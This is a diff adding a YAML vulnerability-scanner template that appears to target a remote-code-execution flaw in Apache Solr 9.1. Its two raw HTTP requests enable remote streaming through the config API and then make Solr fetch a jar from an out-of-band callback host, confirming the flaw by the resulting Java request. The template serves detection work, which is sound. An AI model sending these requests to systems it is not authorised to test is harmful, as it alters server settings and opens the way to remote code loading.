diff --git a/vulnerabilities/apache-solr-9.1-rce.yaml b/vulnerabilities/apache-solr-9.1-rce.yaml new file mode 100644 index 0000000000..50f220fcad --- /dev/null +++ b/vulnerabilities/apache-solr-9.1-rce.yaml @@ -0,0 +1,45 @@ +id: apache-solr-9.1-rce + +info: + name: Apache Solr 9.1 RCE + author: j4vaovo + severity: critical + description: | + Apache Solr 9.1 RCE + reference: + - https://noahblog.360.cn/apache-solr-rce/ + tags: solr,apache,rce,oast + +requests: + - raw: + - | + POST /solr/gettingstarted_shard1_replica_n1/config HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}} + + - | + POST /solr/gettingstarted_shard2_replica_n1/debug/dump?param=ContentStreams HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: multipart/form-data; boundary=------------------------5897997e44b07bf9 + Connection: close + + --------------------------5897997e44b07bf9 + Content-Disposition: form-data; name="stream.url" + + jar:http://{{interactsh-url}}/test.jar?!/Test.class + --------------------------5897997e44b07bf9-- + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + + - type: word + part: interactsh_request + words: + - "User-Agent: Java"